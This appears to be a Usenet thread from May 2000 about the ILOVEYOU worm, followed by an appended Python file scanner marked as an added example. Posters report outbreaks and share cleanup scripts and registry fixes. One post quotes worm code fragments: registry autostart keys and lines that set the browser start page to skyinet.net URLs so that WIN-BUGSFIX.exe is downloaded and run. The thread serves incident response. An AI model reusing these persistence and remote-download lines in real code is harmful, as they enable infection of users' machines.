Needless to say, running the attachment infects your PC, which
will mass-mail out to your address book.
However, a-la-Kak, the email also contains javascript which
will infect your PC unless you have hardened Outlook.
The virus attempts to download components from websites
hosted by www.skyinet.net. Analysis of these components is
ongoing.
Initial analysis also indicates that the virus can also spread
by IRC.
This is already very widespread. We have seen over 500
instances in the last hour.
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Alex Shipp
Imagineer
Messagelabs
~~~~~~~~~~~~~~~~~~~~~~~~~~~
>...comes in an email with the subject line: ILOVEYOU
>and the text: kindly check the attached LOVELETTER coming from me
>and the attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
>
The Lovebug has arrived in Germany. Looks like a really cute one, too :-(
Javascript, downloading a Trojan, mIRC-Script... anybody got news?
--
Juergen Nieveler
Support the ban of Dihydrogen Monoxide: http://www.dhmo.org/
"The people united can never be ignited!"- Sgt. Colon, Ankh-Morpork Watch
PGP-Key available under www.netcologne.de/~nc-nievelju/
It arrived at our site (UK) about an hour ago :-(
--
Nick Cole, PC Support, University of Cambridge, MIS Division
Email: NE...@CAM.AC.UK Tel: 01223 526667 (H) : 01223 766172 (W)
We've got it too.................looks like this one is going to be a
biggie!!!!!!!!!!!!
Morbius
Let's wait for a solution
LS
And us.. F*ck. All global mail servers down currently..
Be on the news too I expect.
Andy
Belgium joins the club. Our mail servers are almost dying on the load.
I know of a few big companies in the Netherlands
who have turned their mailservers down. This is a
big one.....
Willem-Aad
--
Derry Hamilton, ras...@tardis.ed.ac.uk
"I think your cats need tuning - according to a couple of quick measurements
on a recently calibrated reference cat, the dominant frequency of a correctly
adjusted cat should be 12Hz +/-20%." ===Lionel Lauer on a.s.r===
Luckily I was able to recognize it and delete it
from users mailbox before anyone got to work.
So far, our method of dealing with it (in an office of 30)
was to delete all the mails that contained the lovebug virus, in
the inbox, sent items and deleted items.
What this virus appears to do, from what I have been told and
from what I can see, is that on any infected computer that has
IE open, it downloads, probably in the background, components
from the Sky-Inet site, which is made the default. When the
infected computers are open with IE, it places a massive strain
on our system. The only solution at the moment, as far as I can
see, for infected computers, is to wipe them and reinstall
everything. But don't do that on my word - this is just what I
have found from talking to people, and what looks likely.
Hopefully there'll be a less drastic solution. In the meantime,
all those at our company who have been infected are not allowed
to use IE. That's all we can do to stop our server being placed
under tremendous strain. We did reset our server as well, btw,
especially when processor usage was at 100%. It's now down to
about 40 - 50%, which is still higher than usual.
Well, that's what is happening here in London. My best wishes
to all throughout the world who have to deal with this.
Jake
P.S Apparently NTL has completely crashed because of it.
It says it was written by:
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / isp...@mail.com / @GRAMMERSoft Group / Manila,Philippines
It adds a few items to the Run command:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
Contacts a few sites that look suspiciously like porn:
age","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
And then passes on the garbage to the happy recipients in your address
book...
And downloads an executable that also is put under Run:
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
- Anders Gustafsson, Engineer, CNE5, ASE
NSC Volunteer Sysop (http://support.novell.com/forums/)
Pedago, The Aaland Islands (N60 E20)
Using VA 4.52 build 277 (32-bit) on Win95
Daniel
And it will not stop even if you kill the process
or reboot the computer!
It also renames *.jpg to *.jpg.vbs and rewrites
files with virus script!
It infects only Microsoft products (Internet
Explorer, MS Outlook and Outlook Express) but not
Netscape!
There is no antivirus so far!
Steve
In article <8erp38$dt...@ppd00021.deutschepost.de>,
"Daniel Nickel" <d.ni...@deutschepost.de> wrote:
>
> Alex at Starlabs <ash...@starlabs.net> schrieb in im Newsbeitrag:
> 3911...@devnews.star.net.uk...
> > ...comes in an email with the subject line: ILOVEYOU
> > and the text: kindly check the attached LOVELETTER coming from me
> > and the attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
> >
> > Needless to say, running the attachment infects your PC, which
> > will mass-mail out to your address book.
> >
> > However, a-la-Kak, the email also contains javascript which
> > will infect your PC unless you have hardened Outlook.
> >
> > The virus attempt to download components from websites
> > hosted by www.skyinet.net Analysis of these components is
> > ongoing.
> >
> > Initial analysis also indicates that the virus can also spread
> > by IRC.
> >
> >
> > This is already very widespread. We have seen over 500
> > instances in the last hour.
> >
> >
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > Alex Shipp
> > Imagineer
> > Messagelabs
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >
> We've been fully hit some 2 hours ago. All our bigger IT sites in Germany are
> infected, mail servers down, registries done. What now?
>
> Daniel
>
>
"Nick Cole" <ne...@cus.cam.ac.uk> wrote in message
news:8eri8g$smr$1...@pegasus.csx.cam.ac.uk...
> Juergen Nieveler <niev...@netcologne.de> wrote:
> : ash...@starlabs.net (Alex at Starlabs) wrote in
> : <3911...@devnews.star.net.uk>:
>
> :>...comes in an email with the subject line: ILOVEYOU
> :>and the text: kindly check the attached LOVELETTER coming from me
> :>and the attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
> :>
>
> : The Lovebug has arrived in Germany. Looks like a really cute one, too :-(
>
> : Javascript, downloading a Trojan, mIRC-Script... anybody got news?
>
> : --
> : Juergen Nieveler
> : Support the ban of Dihydrogen Monoxide: http://www.dhmo.org/
> : "The people united can never be ignited!"- Sgt. Colon, Ankh-Morpork Watch
http://www.teq-international.com/
and run the loverceaner.vbs
> From: jank...@my-deja.com
> Organization: Deja.com - Before you buy.
> Newsgroups: alt.comp.virus
> Date: Thu, 04 May 2000 12:39:17 GMT
> Subject: Re: Heads up - new virus alert - LoveBug virus
>
> In article <3911...@devnews.star.net.uk>,
> "Alex at Starlabs" <ash...@starlabs.net> wrote:
>> ...comes in an email with the subject line: ILOVEYOU
>> and the text: kindly check the attached LOVELETTER coming from me
>> and the attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
>>
>> Needless to say, running the attachment infects your PC, which
>> will mass-mail out to your address book.
>
> And it will not stop even if you kill the process
> or reboot the computer!
>
> It also renames *.jpg to *.jpg.vbs and rewrites
> files with virus script!
>
> It infects only Microsoft products (Internet
> Explorer, MS Outlook and Outlook Express) but not
> Netscape!
>
> There is no antivirus so far!
>
>
Exchange 5/5.5 with service pack 3 contains a utility called ISSCAN.
Stop Information store service.
You need to create a definition file called iloveyou.txt containing the
following text:
MSG ILOVEYOU 2000/05/04
^
The above space is a TAB
Save the file in your exchsrvr/bin folder and run the following commands:
Isscan -pri -fix -test badmessage -c iloveyou.txt
and
Isscan -pub -fix -test badmessage -c iloveyou.txt
This will generate two log files, named isscan.pub and isscan.prv respectively,
containing information about what file attachments were deleted.
The following attached script may be added to all login scripts to delete the
registry keys and files associated with this worm:
rem *** I love You virus cleaner (fast edit no guarantee) **
rem *** Copyright TEQ-nederland www.teq.nl (fvs)
dim fso,dirsystem,dirwin,dirtemp
on error resume next
Set fso = CreateObject("Scripting.FileSystemObject")
rem 0 = Windows folder, 1 = System folder, 2 = Temp folder
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
rem delete the worm's copies of itself (True = delete read-only files too)
fso.DeleteFile dirsystem&"\MSKernel32.vbs",True
fso.DeleteFile dirwin&"\Win32DLL.vbs",True
fso.DeleteFile dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs",True
fso.DeleteFile dirsystem&"\LOVE-LETTER-FOR-YOU.TXT",True
fso.DeleteFile dirsystem&"\LOVE-LETTER-FOR-YOU.HTM",True
fso.DeleteFile dirtemp&"\LOVE-LETTER-FOR-YOU.TXT.vbs",True
fso.DeleteFile dirtemp&"\LOVE-LETTER-FOR-YOU.TXT",True
regruns
rem blank the worm's autostart values and reset the IE start page
sub regruns()
On Error Resume Next
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",""
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",""
rem the worm writes this value name with a hyphen: WIN-BUGSFIX
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",""
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end sub
rem write one registry value
sub regcreate(regkey,regvalue)
dim regedit
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
rem read one registry value
function regget(value)
dim regedit
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
rem returns 0 if the file exists, 1 if it does not
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
rem returns 0 if the folder exists, 1 if it does not
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.FolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
folderexist = msg
end function
This process only gets rid of current worm activity on your immediate server
information store and for clients that logon. If users use PST files to store
mail, they will still be affected. Educate your users not to open any
attachments with the subject line “ILOVEYOU” until a formal fix is introduced.
1/Execute the "regedit" program from "Start" menu/"Run..."
2/ Using this program, go in
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" and
remove the entry containing MSKernel32.vbs
3/ Do the same with
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices"
and Win32DLL.vbs
4/ Go in to the control panel and double-click Internet Options, delete the
home page address and fill out a new address to your own preference.
5/ The virus also infects files on network drives by writing the virus
script in files with those extensions: vbs, vbe, js, jse, css, wsh, sct,
hta, jpeg, jpg, mp3, mp2. You can check this by making a "Find" on every
network drive, looking for the string "loveletter" (in the field
"Containing text:"). And erase all these files.
FB
Support Engineer
Alex at Starlabs wrote:
>
>
> ...comes in an email with the subject line: ILOVEYOU
> and the text: kindly check the attached LOVELETTER coming from me
> and the attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
>
> Needless to say, running the attachment infects your PC, which
> will mass-mail out to your address book.
>
> However, a-la-Kak, the email also contains javascript which
> will infect your PC unless you have hardened Outlook.
>
> The virus attempt to download components from websites
> hosted by www.skyinet.net Analysis of these components is
> ongoing.
>
> Initial analysis also indicates that the virus can also spread
> by IRC.
>
>
> This is already very widespread. We have seen over 500
> instances in the last hour.
>
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~
> Alex Shipp
> Imagineer
> Messagelabs
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
>
>
--
Posted via CNET Help.com
http://www.help.com/
Um, are you sure about it affecting OE which is very different from Outlook?
<snip>
>
>5/ The virus also infects files on network drives by writing the virus
>script in files with those extensions: vbs, vbe, js, jse, css, wsh, sct,
>hta, jpeg, jpg, mp3, mp2. You can check this by making a "Find" on every
>network drive, looking for the string "loveletter" (in the
>field "Containing
>text:"). And erase al this files.
>
What's the meaning of rewriting picture and sound files? They don't
contain executable code. Only if their extension is changed to, but
this can be seen. Or am I wrong? I'm a sound engineer and I simply
don't want to lose all my data. (Btw you didn't mention wav files so I
suppose these can't be infected.)
>
>FB
>Support Engineer
The virus also tries to use companion techniques, adding a secondary file
next to existing file - hoping that the user will click on the wrong
file.
This is done so that the virus locates files with jpg, jpeg, mp3 and mp2
and adds a new file next to it. For example, a picture named "pic.jpg" will
cause a new file called "pic.jpg.vbs" to be created.
Henry
hcr...@earthlink.net
> On Thu, 04 May 2000 15:30:07 GMT, Fille <fbe...@hotmail.com> wrote:
>
> <snip>
> >
> >5/ The virus also infects files on network drives by writing the virus
> >script in files with those extensions: vbs, vbe, js, jse, css, wsh, sct,
> >hta, jpeg, jpg, mp3, mp2. You can check this by making a "Find" on every
> >network drive, looking for the string "loveletter" (in the
> >field "Containing
> >text:"). And erase al this files.
> >
> What's the meaning of rewriting picture and sound files? The don't
> contain executable code. Only if their extension is changed to, but
> this can be seen. Or am I wrong.
theoretically the change in extension can be seen, however under windows
explorer the default settings hide the extensions of known file types and
*.vbs happens to be one of those extensions that get hidden...
and you're right that picture and sound files don't generally contain
executable code - however in windows explorer they are viewed or launched
using the same action as executing a program - by double clicking on
them... and those overwritten files can be shared with other people to
spread the infection further (how many people check a *.jpg to make
sure it's still the *.jpg they thought it was before they send it off
to a friend?)...
> I'm a sound engineer and I simply
> don't want to lose all my data. (Btw you didn't mention wav files so I
> suppose these can't be infected.
they can still be damaged by viruses... if you don't want to lose your
data to viruses, consider adopting a backup policy...
--
"i'm gonna break,
i'm gonna break my,
i'm gonna break my rusty cage,
and run"
Alex
According to Symantec, "...users of Norton Systemworks will be able to
recover these files if NProtect is running at the time of
infection." (http://www.symantec.com/avcenter/venc/data/vbs.loveletter.a.html)
Ben
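Added example, not part of any post in this thread and not code from TEQ or any vendor: a scanner for the two file-level signs described above, the "loveletter" string search from step 5 of the removal post and the companion files such as "pic.jpg.vbs" that Explorer's hidden extensions disguise. The function names, the "unreadable" result, the 64 KB read limit and the sample tree are assumptions made for illustration.

```python
import pathlib
import tempfile

# Extension lists taken from step 5 of the removal post in this thread.
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".css", ".wsh", ".sct", ".hta"}
MEDIA_EXTS = {".jpg", ".jpeg", ".mp3", ".mp2"}
MARKER = b"loveletter"  # the string the post says to search for

def classify(path):
    """Return the findings for one file; an empty list means nothing matched."""
    path = pathlib.Path(path)
    last = path.suffix.lower()
    inner = pathlib.Path(path.stem).suffix.lower()
    findings = []
    # pic.jpg.vbs or LOVE-LETTER-FOR-YOU.TXT.vbs: script behind a decoy extension.
    if last in SCRIPT_EXTS and inner in MEDIA_EXTS | {".txt"}:
        findings.append("double-extension")
    if last in SCRIPT_EXTS | MEDIA_EXTS:
        try:
            with path.open("rb") as fh:
                if MARKER in fh.read(64 * 1024).lower():
                    findings.append("marker")
        except OSError:
            findings.append("unreadable")
    return findings

def scan(root):
    """Map each flagged file (path relative to root) to its findings."""
    hits = {}
    for p in pathlib.Path(root).rglob("*"):
        if p.is_file() and (found := classify(p)):
            hits[p.relative_to(root).as_posix()] = found
    return hits

def build_sample_tree(root):
    """Write constructed sample files: inert placeholder text, no worm code."""
    samples = {
        "pic.jpg": b"\xff\xd8\xff\xe0 placeholder image bytes",
        "pic.jpg.vbs": b"rem barok -loveletter(vbe)\n",
        "site/style.css": b"rem barok -LOVELETTER(vbe)\n",
        "notes.txt.vbs": b"WScript.Echo 1\n",
    }
    for rel, data in samples.items():
        p = pathlib.Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(data)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        print(scan(tmp))
```

A "marker" hit on a file that kept its original name (style.css here) means the content was overwritten, so it has to be restored from backup rather than cleaned.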